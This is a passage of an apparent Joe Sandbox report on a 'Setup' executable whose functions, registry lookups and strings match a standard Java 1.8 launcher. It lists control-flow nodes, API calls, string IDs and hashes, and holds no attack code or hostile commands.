17992->17994 18169 7ff764a16cc4 17993->18169 17999 7ff764a16630 61 API calls 17994->17999 17995->17998 17997 7ff764a111b8 52 API calls 17997->18006 17998->17997 17998->18006 18004 7ff764a13dbb 17999->18004 18000 7ff764a13c92 18001 7ff764a112a8 60 API calls 18000->18001 18002 7ff764a13cd5 18001->18002 18005 7ff764a13cda 18002->18005 18013 7ff764a13cf5 18002->18013 18003->17991 18151 7ff764a14698 18003->18151 18007 7ff764a16630 61 API calls 18004->18007 18185 7ff764a1713c 18005->18185 18006->17985 18006->17987 18010 7ff764a13dd7 18007->18010 18008 7ff764a13d0e 18191 7ff764a15c4c 18008->18191 18011 7ff764a13ceb 18011->18004 18012 7ff764a13cf3 
18011->18012 18012->17988 18013->18008 18014 7ff764a13d69 18013->18014 18232 7ff764a16630 18014->18232 18017 7ff764a13d77 18017->17986 18023 7ff764a15995 18018->18023 18020 7ff764a16630 61 API calls 18025 7ff764a15c14 18020->18025 18021 7ff764a15a25 18028 7ff764a15bfd 18021->18028 18848 7ff764a1348c 18021->18848 18039 7ff764a15be4 18023->18039 18831 7ff764a16220 18023->18831 18024 7ff764a15a79 18024->18025 18873 7ff764a11924 18024->18873 18027 7ff764a16630 61 API calls 18025->18027 18026 7ff764a16630 61 API calls 18026->18028 18030 7ff764a15c2b 18027->18030 18028->18020 18031 7ff764a16630 61 API calls 18030->18031 18032 7ff764a15c40 18031->18032 18034 7ff764a15a94 18034->18030 18893 7ff764a277cc 18034->18893 18036 7ff764a15bd2 18038 7ff764a16630 61 API calls 18036->18038 18037 7ff764a15ba9 _handle_error 18037->17871 18038->18039 18039->18026 18040 7ff764a161d4 26 API calls 18041 7ff764a15b21 18040->18041 18041->18037 18041->18040 18043 7ff764a117d9 18042->18043 18048 7ff764a117f7 memcpy_s 18042->18048 18044 7ff764a11809 18043->18044 18045 7ff764a117e3 18043->18045 18047 7ff764a111b8 52 API calls 18044->18047 18046 7ff764a111b8 52 API calls 18045->18046 18046->18048 18047->18048 18049 7ff764a1188e 18048->18049 19397 7ff764a14498 18048->19397 18051 7ff764a14498 29 API calls 18049->18051 18052 7ff764a118c5 18049->18052 18051->18052 18053 7ff764a118fc 18052->18053 18054 7ff764a14498 29 API calls 18052->18054 18053->17859 18054->18053 18056 7ff764a1406e 18055->18056 18059 7ff764a13e74 __vcrt_freefls 18055->18059 18056->17874 18057 7ff764a111b8 52 API calls 18058 7ff764a13fbd GetCurrentProcessId 18057->18058 18058->18059 18059->18056 18059->18057 18060 7ff764a111b8 52 API calls 18059->18060 18062 7ff764a1115c 60 API calls wprintf 18059->18062 18061 7ff764a14000 GetCurrentProcessId 18060->18061 18061->18059 18062->18059 18064 7ff764a1566d QueryPerformanceFrequency 18063->18064 18065 7ff764a15689 18063->18065 18064->18065 18066 7ff764a15697 QueryPerformanceCounter 
18065->18066 18067 7ff764a15693 18065->18067 18066->18067 18067->17879 18069 7ff764a112a8 60 API calls 18068->18069 18070 7ff764a16a28 18069->18070 18071 7ff764a16aa0 93 API calls 18070->18071 18072 7ff764a16a2d LoadLibraryA 18071->18072 18073 7ff764a16a47 GetProcAddress GetProcAddress 18072->18073 18074 7ff764a16a3e 18072->18074 18073->18074 18075 7ff764a16a79 18074->18075 18076 7ff764a16630 61 API calls 18074->18076 18075->17886 18076->18075 18078 7ff764a112f9 18077->18078 18079 7ff764a112d2 wprintf 18077->18079 18078->17898 18078->17899 18080 7ff764a1ed08 wprintf 60 API calls 18079->18080 18080->18078 18082 7ff764a111b8 52 API calls 18081->18082 18086 7ff764a142e8 18082->18086 18083 7ff764a120a4 18094 7ff764a115fc 18083->18094 18084 7ff764a14326 18085 7ff764a14359 18084->18085 18089 7ff764a14432 18084->18089 18087 7ff764a1127c 52 API calls 18085->18087 18092 7ff764a14382 18085->18092 18086->18084 18088 7ff764a1127c 52 API calls 18086->18088 18087->18085 18088->18086 18090 7ff764a16630 61 API calls 18089->18090 18091 7ff764a1443e 18090->18091 18092->18083 18093 7ff764a17a14 66 API calls 18092->18093 18093->18092 18095 7ff764a1163c 18094->18095 18096 7ff764a1169a 18095->18096 18098 7ff764a17a14 66 API calls 18095->18098 18097 7ff764a1618c GetModuleFileNameA 18096->18097 18099 7ff764a116a9 18097->18099 18106 7ff764a1164e 18098->18106 18100 7ff764a116ad 18099->18100 18101 7ff764a116c0 18099->18101 18102 7ff764a16630 61 API calls 18100->18102 18103 7ff764a111b8 52 API calls 18101->18103 18105 7ff764a116b9 _handle_error 18102->18105 18104 7ff764a116d3 sprintf 18103->18104 18108 7ff764a117b4 55 API calls 18104->18108 18105->17905 18106->18096 18107 7ff764a111b8 52 API calls 18106->18107 18109 7ff764a1167b sprintf 18107->18109 18110 7ff764a116f4 18108->18110 18112 7ff764a117b4 55 API calls 18109->18112 18111 7ff764a111b8 52 API calls 18110->18111 18114 7ff764a1172a 18111->18114 18112->18096 18113 7ff764a117b4 55 API calls 18113->18105 18114->18113 18116 7ff764a13de9 
18115->18116 18122 7ff764a13e4c 18115->18122 18117 7ff764a17a14 66 API calls 18116->18117 18118 7ff764a13e00 18117->18118 18119 7ff764a111b8 52 API calls 18118->18119 18118->18122 18120 7ff764a13e2d sprintf 18119->18120 18121 7ff764a117b4 55 API calls 18120->18121 18121->18122 18122->17905 18125 7ff764a1210e 18123->18125 18132 7ff764a12c2b sprintf 18123->18132 18124 7ff764a130b3 18127 7ff764a16630 61 API calls 18124->18127 18125->17888 18125->17913 18134 7ff764a17a14 18125->18134 18126 7ff764a13de4 66 API calls 18126->18132 18127->18125 18128 7ff764a117b4 55 API calls 18128->18132 18129 7ff764a130cd 19561 7ff764a122a0 18129->19561 18131 7ff764a111b8 52 API calls 18131->18132 18132->18124 18132->18125 18132->18126 18132->18128 18132->18129 18132->18131 18133 7ff764a16630 61 API calls 18132->18133 18133->18132 18135 7ff764a17a30 18134->18135 18136 7ff764a17a35 18135->18136 19567 7ff764a178fc 18135->19567 18136->17915 18142 7ff764a17a59 18142->18136 18143 7ff764a1115c wprintf 60 API calls 18142->18143 18143->18136 19599 7ff764a14168 18144->19599 18146 7ff764a169dd 18148 7ff764a11228 18147->18148 18149 7ff764a11247 18148->18149 18150 7ff764a112a8 60 API calls 18148->18150 18149->17856 18150->18149 18243 7ff764a29364 18151->18243 18154 7ff764a147e0 18154->17991 18156 7ff764a146ea 18157 7ff764a147e9 18156->18157 18256 7ff764a150bc 18156->18256 18159 7ff764a28b28 28 API calls 18157->18159 18159->18154 18160 7ff764a14700 18160->18157 18164 7ff764a14710 18160->18164 18161 7ff764a147d9 18260 7ff764a28b28 18161->18260 18163 7ff764a289e4 26 API calls 18163->18164 18164->18161 18164->18163 18166 7ff764a17478 18165->18166 18168 7ff764a1748e 18165->18168 18167 7ff764a1127c 52 API calls 18166->18167 18166->18168 18167->18168 18168->17992 18170 7ff764a16d0b RegOpenKeyExA 18169->18170 18171 7ff764a16d38 RegEnumKeyA 18170->18171 18181 7ff764a16d5f 18170->18181 18171->18181 18172 7ff764a16e67 RegCloseKey 18172->18181 18173 7ff764a1713c 55 API calls 18173->18181 18174 7ff764a16d9e 
RegEnumKeyA 18174->18181 18175 7ff764a16e7a _handle_error 18175->18000 18177 7ff764a1127c 52 API calls 18177->18181 18178 7ff764a16dc1 RegOpenKeyExA 18178->18181 18179 7ff764a16e03 RegQueryValueExA 18179->18181 18180 7ff764a16df6 RegCloseKey 18180->18181 18181->18170 18181->18172 18181->18173 18181->18174 18181->18175 18181->18177 18181->18178 18181->18179 18181->18180 18182 7ff764a16e45 RegCloseKey 18181->18182 18183 7ff764a16ea5 18181->18183 18692 7ff764a17254 18181->18692 18182->18181 18183->18175 18184 7ff764a16eaf RegCloseKey 18183->18184 18184->18175 18186 7ff764a1127c 52 API calls 18185->18186 18187 7ff764a1715f 18186->18187 18189 7ff764a17254 55 API calls 18187->18189 18190 7ff764a1722b 18187->18190 18722 7ff764a1736c 18187->18722 18189->18187 18190->18011 18729 7ff764a11d94 18191->18729 18193 7ff764a15c8b GetModuleFileNameA 18194 7ff764a160f8 18193->18194 18195 7ff764a15caa 18193->18195 18196 7ff764a16728 64 API calls 18194->18196 18195->18194 18197 7ff764a112a8 60 API calls 18195->18197 18198 7ff764a16108 18196->18198 18199 7ff764a15cc5 18197->18199 18200 7ff764a112a8 60 API calls 18199->18200 18201 7ff764a15cd4 18200->18201 18730 7ff764a2a3e4 18201->18730 18203 7ff764a15ceb 18204 7ff764a16057 _handle_error 18203->18204 18205 7ff764a15d0d GetCommandLineA 18203->18205 18204->17988 18206 7ff764a1127c 52 API calls 18205->18206 18207 7ff764a15d1b 18206->18207 18208 7ff764a111b8 52 API calls 18207->18208 18231 7ff764a15d52 18208->18231 18209 7ff764a15fc7 wprintf 18746 7ff764a27088 18209->18746 18210 7ff764a111b8 52 API calls 18210->18231 18211 7ff764a1127c 52 API calls 18212 7ff764a15f91 18211->18212 18215 7ff764a1115c wprintf 60 API calls 18212->18215 18214 7ff764a15fde wprintf 18217 7ff764a27088 56 API calls 18214->18217 18216 7ff764a15fb6 18215->18216 18218 7ff764a1115c wprintf 60 API calls 18216->18218 18220 7ff764a15ff0 __scrt_get_show_window_mode 18217->18220 18218->18209 18219 7ff764a15f37 18219->18209 18219->18211 18221 7ff764a16016 CreateProcessA 
18220->18221 18222 7ff764a1609f WaitForSingleObject 18221->18222 18223 7ff764a16055 18221->18223 18224 7ff764a160c9 18222->18224 18225 7ff764a160b3 GetExitCodeProcess 18222->18225 18752 7ff764a16728 18223->18752 18229 7ff764a16630 61 API calls 18224->18229 18227 7ff764a160c7 18225->18227 18228 7ff764a160d9 CloseHandle CloseHandle 18225->18228 18227->18228 18228->18194 18229->18227 18230 7ff764a16097 18230->18222 18231->18210 18231->18219 18233 7ff764a16658 wprintf 18232->18233 18234 7ff764a166e2 wprintf 18233->18234 18235 7ff764a16664 18233->18235 18236 7ff764a1ed08 wprintf 60 API calls 18234->18236 18237 7ff764a111b8 52 API calls 18235->18237 18238 7ff764a16702 wprintf 18236->18238 18239 7ff764a16697 18237->18239 18241 7ff764a14454 fwprintf 60 API calls 18238->18241 18240 7ff764a166bc MessageBoxA 18239->18240 18242 7ff764a166e0 18240->18242 18241->18242 18242->18017 18275 7ff764a28c8c 18243->18275 18246 7ff764a14cec 18247 7ff764a14d24 18246->18247 18255 7ff764a14d2f _handle_error __vcrt_freefls 18247->18255 18633 7ff764a14804 18247->18633 18249 7ff764a14d42 18249->18255 18638 7ff764a29e24 18249->18638 18251 7ff764a29e24 37 API calls 18252 7ff764a14d65 memcpy_s 18251->18252 18252->18251 18253 7ff764a14ebd 18252->18253 18252->18255 18254 7ff764a29e24 37 API calls 18253->18254 18253->18255 18254->18255 18255->18156 18257 7ff764a150e7 18256->18257 18259 7ff764a1512c __vcrt_freefls 18256->18259 18258 7ff764a29e24 37 API calls 18257->18258 18257->18259 18258->18259 18259->18160 18261 7ff764a28b38 18260->18261 18264 7ff764a28b4d 18260->18264 18263 7ff764a267fc wprintf 14 API calls 18261->18263 18262 7ff764a28ba9 18265 7ff764a267fc wprintf 14 API calls 18262->18265 18266 7ff764a28b3d 18263->18266 18264->18262 18267 7ff764a28b7c 18264->18267 18268 7ff764a28bae 18265->18268 18269 7ff764a2681c _get_daylight 14 API calls 18266->18269 18681 7ff764a28ab4 18267->18681 18271 7ff764a2681c _get_daylight 14 API calls 18268->18271 18272 7ff764a28b45 18269->18272 18273 7ff764a28bb6 
18271->18273 18272->18154 18274 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18273->18274 18274->18272 18276 7ff764a28c97 18275->18276 18277 7ff764a28cb0 18275->18277 18279 7ff764a2681c _get_daylight 14 API calls 18276->18279 18287 7ff764a29388 18277->18287 18281 7ff764a28c9c 18279->18281 18283 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18281->18283 18282 7ff764a28d23 18285 7ff764a2681c _get_daylight 14 API calls 18282->18285 18286 7ff764a146b4 18282->18286 18283->18286 18285->18286 18286->18154 18286->18246 18288 7ff764a1d120 sscanf 26 API calls 18287->18288 18289 7ff764a293db 18288->18289 18292 7ff764a293eb 18289->18292 18299 7ff764a2b818 18289->18299 18302 7ff764a26918 18292->18302 18294 7ff764a29443 18296 7ff764a28ce6 18294->18296 18297 7ff764a2b560 __free_lconv_mon 14 API calls 18294->18297 18296->18282 18298 7ff764a2f830 LeaveCriticalSection 18296->18298 18297->18296 18300 7ff764a2b5a0 try_get_function 5 API calls 18299->18300 18301 7ff764a2b838 18300->18301 18301->18292 18303 7ff764a26941 18302->18303 18304 7ff764a26963 18302->18304 18307 7ff764a2b560 __free_lconv_mon 14 API calls 18303->18307 18318 7ff764a2694f 18303->18318 18305 7ff764a26967 18304->18305 18306 7ff764a269bc 18304->18306 18310 7ff764a2697b 18305->18310 18311 7ff764a26972 18305->18311 18305->18318 18308 7ff764a2dd4c sscanf MultiByteToWideChar 18306->18308 18307->18318 18309 7ff764a269d7 18308->18309 18313 7ff764a269de GetLastError 18309->18313 18317 7ff764a26a40 18309->18317 18321 7ff764a26a0b 18309->18321 18322 7ff764a26a02 18309->18322 18312 7ff764a2c044 wprintf 15 API calls 18310->18312 18314 7ff764a2b560 __free_lconv_mon 14 API calls 18311->18314 18315 7ff764a26988 18312->18315 18369 7ff764a267ac 18313->18369 18314->18310 18315->18318 18319 7ff764a2dd4c sscanf MultiByteToWideChar 18317->18319 18318->18294 18328 7ff764a294d4 18318->18328 18325 7ff764a26a5f 18319->18325 18320 7ff764a269eb 18326 7ff764a2681c _get_daylight 14 API calls 18320->18326 18324 7ff764a2c044 wprintf 
7ff764a17d30 19650->19652 19651->19650 19653 7ff764a17d4b 19652->19653 19654 7ff764a17d57 19652->19654 19655 7ff764a16ed8 90 API calls 19653->19655 19654->19620 19655->19654 19657 7ff764a17d11 19656->19657 19658 7ff764a17d05 19656->19658 19657->19620 19659 7ff764a16ed8 90 API calls 19658->19659 19659->19657 19661 7ff764a1425d 19660->19661 19662 7ff764a17d94 19660->19662 19664 7ff764a16f98 19661->19664 19663 7ff764a16ed8 90 API calls 19662->19663 19663->19661 19665 7ff764a16faa 19664->19665 19666 7ff764a111b8 52 API calls 19665->19666 19667 7ff764a16fb3 19666->19667 19667->19626 19669 7ff764a16220 88 API calls 19668->19669 19670 7ff764a16f09 19669->19670 19671 7ff764a16f74 _handle_error 19670->19671 19672 7ff764a16f4f LoadLibraryA 19670->19672 19673 7ff764a16f66 GetProcAddress 19670->19673 19671->19633 19672->19671 19672->19673 19673->19671 19675 7ff764a2caec sscanf 26 API calls 19674->19675 19676 7ff764a28919 19675->19676 19677 7ff764a2a544 sscanf 26 API calls 19676->19677 19678 7ff764a2892f 19677->19678 20484 7ff764a38ee5 20485 7ff764a38efe 20484->20485 20486 7ff764a38ef4 20484->20486 20488 7ff764a2f57c LeaveCriticalSection 20486->20488

Control-flow Graph (legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: wprintf$CommonControlsInitsprintf
• String ID: debug:%s$dotversion:%s$ergo_policy:$fullversion:%s$javargs:%s$javaw:%s$launcher name:%s$program name:%s$%ld micro seconds to LoadJavaVM$-Djava.class.path=%s$-Dsun.java.command=$-Dsun.java.launcher.diag=true$-Dsun.java.launcher=SUN_STANDARD$ALWAYS_ACT_AS_A_SERVER_CLASS_MACHINE$CLASSPATH$Command line args:$DEFAULT_ERGONOMICS_POLICY$Launcher state:$NEVER_ACT_AS_A_SERVER_CLASS_MACHINE$argv[%d] = %s$off
• API String ID: 3782895439-2613195925
• Opcode ID: 35aa27bf56d7e74ef57a47c8dcd04c09e893ff32923b0b57d3ae2ec0596db681
• Instruction ID: 4fd300cfa603697596d8b533687f437e055b872783f6d9b2e2e717acd1140242
• Opcode Fuzzy Hash: 35aa27bf56d7e74ef57a47c8dcd04c09e893ff32923b0b57d3ae2ec0596db681
• Instruction Fuzzy Hash: BAD19E32A08642E5EA52FF13E8C09F9E771AF9A784FE00036E94D47796DE2CE545C720

Control-flow Graph

APIs
Strings
Similarity
• API ID: Close$OpenQueryValuewprintf$Message
• String ID: CurrentVersion$Error: Failed reading value of registry key:%s\CurrentVersion$Error: Registry key '%s'\CurrentVersion'has value '%s', but '%s' is required.$Error: opening registry key '%s'$Failed reading value of registry key:%s\%s\JavaHome$JavaHome$MicroVersion$Software\JavaSoft\Java Runtime Environment$Version major.minor.micro = %s.%s$Warning: Can't read MicroVersion
• API String ID: 1004157669-1407590046
• Opcode ID: c08fc69ab7d0758b2109dd942bfb8d28955c23fcd95e4411def2c2e65afa633d
• Instruction ID: c2b1ab748d930969b45d695e5e839c9215d2adcf4d66c72675098b91443d46f3
• Opcode Fuzzy Hash: c08fc69ab7d0758b2109dd942bfb8d28955c23fcd95e4411def2c2e65afa633d
• Instruction Fuzzy Hash: 52514D31A18682E2EA12BF52E8D09FAA371FF95794FE01032E94E97755DE3CD509C720

Control-flow Graph

APIs
Strings
Similarity
• API ID: wprintf$CommandLine
• String ID: 1.8$1.8.0_381-b09$Windows original main args:$_JAVA_LAUNCHER_DEBUG$wwwd_args[%d] = %s
• API String ID: 921100755-1407750259
• Opcode ID: d8f7644c556615631eb1845b4a037e8a21cf320a5f394ecba67ce57f01b19ca9
• Instruction ID: 7c3c1b75e1a6d8d45a8c56f444d6031b52665afed82019a7b4dde1c5e8abfb24
• Opcode Fuzzy Hash: d8f7644c556615631eb1845b4a037e8a21cf320a5f394ecba67ce57f01b19ca9
• Instruction Fuzzy Hash: 25318231A08A82E5FB52AF56E5C0AB9F771AF98B84FA04135DA4D43756DF3CE044C320

Control-flow Graph

APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 1452418845-0
• Opcode ID: 29b13c7cf00c402d89aedddd03e07bd6005fa31edf51c8e0e98308c6cd2c8403
• Instruction ID: 16268b2b0c9d815b562d429b4f8567a5768f815f6a38030292672f18e762f548
• Opcode Fuzzy Hash: 29b13c7cf00c402d89aedddd03e07bd6005fa31edf51c8e0e98308c6cd2c8403
• Instruction Fuzzy Hash: 7E316B21E0D143E5FA16BF6795D1FF9A2A2AF40384FE44039E54E472D7DE2CA409C230

Control-flow Graph

APIs
Strings
Similarity
• API ID: Messagefwprintf
• String ID: Java Virtual Machine Launcher
• API String ID: 1438246221-898708411
• Opcode ID: 7f12cdf1833f9ca9ebd8898dfd4ec3a12a6f9da31f53ff1fcf5cdf72b08ebb12
• Instruction ID: 4ab550a9410439cad93026fbfb4f7abfd3422327ae13b2e3f4016774fe8fc3ae
• Opcode Fuzzy Hash: 7f12cdf1833f9ca9ebd8898dfd4ec3a12a6f9da31f53ff1fcf5cdf72b08ebb12
• Instruction Fuzzy Hash: 9F21C73260864191EB11AF63E895BB9E661AF99BC4FA44139EE4D47792DF3CD1018310

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CloseCreateDriveFileHandleType_invalid_parameter_noinfo
• String ID:
• API String ID: 2907017715-0
• Opcode ID: a33ca38b42f5ad457585b92045b84c00a2e9d242f388010a2427c9583d10d8ac
• Instruction ID: f32a296df540e2f6f6766bd4c99d4a63ac83d198d828db0860260b3404449c7f
• Opcode Fuzzy Hash: a33ca38b42f5ad457585b92045b84c00a2e9d242f388010a2427c9583d10d8ac
• Instruction Fuzzy Hash: 91311932D09781D6F610BF269940A6AB650FF457A0F685335EAAC237E1DF3CE2A09750

Control-flow Graph

APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 799936e69fd531bd261ff7b62f03790f280960af208326ac74684e5982d33f97
• Instruction ID: b9b6457200ebaa9b5f0c1e1385f0fbadd53a3f36987ad36a7f24b0108441cb34
• Opcode Fuzzy Hash: 799936e69fd531bd261ff7b62f03790f280960af208326ac74684e5982d33f97
• Instruction Fuzzy Hash: B9E01220A05742E2EA957F2299C5A7953676F84701FA0443DD80E43352EE3DA8488220

Control-flow Graph

APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: cb96273a2151a35e2a73fd447c71a94cb89efb4fccae3b55bb54ce2bf4947032
• Instruction ID: 4f95e778842b7dc0726e5c8b8c618f696c136c5d4b0869466e13ec544fee147c
• Opcode Fuzzy Hash: cb96273a2151a35e2a73fd447c71a94cb89efb4fccae3b55bb54ce2bf4947032
• Instruction Fuzzy Hash: A5219832E04782EAEB12AF65D4846AD73B1EB4430CFA4443AE60D03A85DF7CC485CBA0
APIs
Strings
Similarity
• API ID: memcpy_s$_invalid_parameter_noinfo
• String ID: $
• API String ID: 2880407647-227171996
• Opcode ID: 0238494e4185e9e0452f616f036e6ea2473bf2d3c40658a8c9b8098016ed82eb
• Instruction ID: 3919a56534343ea01773cf634b14cbcbe3b8c97a33c8960e02740e0839e46197
• Opcode Fuzzy Hash: 0238494e4185e9e0452f616f036e6ea2473bf2d3c40658a8c9b8098016ed82eb
• Instruction Fuzzy Hash: 7003E772A181C2DBE775DE26D480BFAB791FB8438CF985135DA0A67F44DB38DA009B50
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: b2886f78b3e801e6384d34c3a3f2cd6676a6e4bd5269c4a29a9d638173f13b0c
• Instruction ID: d639eed2bfe88f8cb4edad1f84d8d3e6e65306abd3aa190cf202bfe84badf104
• Opcode Fuzzy Hash: b2886f78b3e801e6384d34c3a3f2cd6676a6e4bd5269c4a29a9d638173f13b0c
• Instruction Fuzzy Hash: CAB20A72E18282DBE7669E66D480BFDB7A1FB44348FA05135DA0D97E84EF39E500CB50
APIs
Strings
Similarity
• API ID: Message$ErrorFormatFreeLastLocalfwprintf
• String ID: Java Virtual Machine Launcher
• API String ID: 3630131139-898708411
• Opcode ID: 34e35c17a90e0a6dac7562f769ba0c42994651291d7eb5778f65e679b0df0a84
• Instruction ID: 4dbf25007d8ab1258381edad532e3cd9a1b9a0d80457a7e1daa47faaa2e97b26
• Opcode Fuzzy Hash: 34e35c17a90e0a6dac7562f769ba0c42994651291d7eb5778f65e679b0df0a84
• Instruction Fuzzy Hash: 3151B672A08652E6FB21AF62D9C1BBDA6A1BB48798F944535DE4D87781DF3CD4048320
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
• String ID:
• API String ID: 435049134-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
• FindFirstFileA.KERNEL32(00000000,00000000,?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17AF0
• FindNextFileA.KERNEL32(?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17B3B
• FindClose.KERNEL32(?,00007FF764A176FD,?,?,?,00007FF764A17A4F,?,?,?,00007FF764A13E00), ref: 00007FF764A17C31
Strings
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: JAR$jar
• API String ID: 3541575487-1396542530
APIs
Similarity
• API ID: ErrorFileLastWrite$ConsoleOutput
• String ID:
• API String ID: 1443284424-0
APIs
• _get_daylight.LIBCMT ref: 00007FF764A36A6A
  • Part of subcall function 00007FF764A361A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A361BC
• _get_daylight.LIBCMT ref: 00007FF764A36A7B
  • Part of subcall function 00007FF764A36148: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A3615C
• _get_daylight.LIBCMT ref: 00007FF764A36A8C
  • Part of subcall function 00007FF764A36178: _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A3618C
  • Part of subcall function 00007FF764A2B560: HeapFree.KERNEL32(?,?,?,00007FF764A327DC,?,?,?,00007FF764A3281F,?,?,00000000,00007FF764A32CE4,?,?,?,00007FF764A32C17), ref: 00007FF764A2B576
  • Part of subcall function 00007FF764A2B560: GetLastError.KERNEL32(?,?,?,00007FF764A327DC,?,?,?,00007FF764A3281F,?,?,00000000,00007FF764A32CE4,?,?,?,00007FF764A32C17), ref: 00007FF764A2B588
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF764A36C98), ref: 00007FF764A36AB3
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Strings
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
                                                                                                                                                                                                            • Opcode ID: 51cdd9079e68ce62684cac5115b1afc2b6653c272f767fd36a0a2a5a613cb686
                                                                                                                                                                                                            • Instruction ID: be727db6e7bc3c88ede6b606b3a67faee3138da742d4caa7d84f1a901d2697f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51cdd9079e68ce62684cac5115b1afc2b6653c272f767fd36a0a2a5a613cb686
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6591F622E08252E6EB31BF27D490B7AA661EB44BD4FA49131EA4C877C5EF3CD4518750
APIs
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A2D83E
  • Part of subcall function 00007FF764A2B4A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4A9
  • Part of subcall function 00007FF764A2B4A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4CE
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
• String ID: -
• API String ID: 4036615347-2547889144
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A31DB4
  • Part of subcall function 00007FF764A2B4A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4A9
  • Part of subcall function 00007FF764A2B4A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4CE
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
• String ID: *?
• API String ID: 4036615347-2564092906
APIs
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
